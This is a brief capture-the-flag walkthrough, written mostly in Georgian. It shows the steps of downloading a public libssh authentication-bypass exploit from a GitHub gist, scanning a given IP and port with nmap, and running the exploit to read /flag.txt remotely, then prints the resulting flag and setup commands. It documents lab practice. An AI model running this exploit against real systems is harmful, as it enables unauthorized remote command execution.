რო შევდივართ არაფერია:34.185.133.186:32693
ჯერ გადმოვიწეროთ ექსპლოიტი:https://gist.github.com/mgeeky/a7271536b1d815acfb8060fd8b65bd5d
wget https://gist.github.com/mgeeky/a7271536b1d815acfb8060fd8b65bd5d/raw -O libssh_bypass.py ეგრევე რო გადმოიწეროს ლინუქსმა
ls რო ვნახოთ ექსპლოიტი
ვცადოთ try port scanning using Nmap
nmap -sV -sC -p 32693 34.185.133.186 -Pn
შემდეგ ეს ჩავწეროთ:
python3 libssh_bypass.py -p 32693 -c "cat /flag.txt" 34.185.133.186

CTF{754a4874399c6c15f6f12d31bccb438d1d42b540e5cec9c2371a831bb1eabeed}


გადმოსაწერი:
pip3 install paramiko
sudo apt update
sudo apt install nmap -y
python3 --version
sudo apt install curl -y
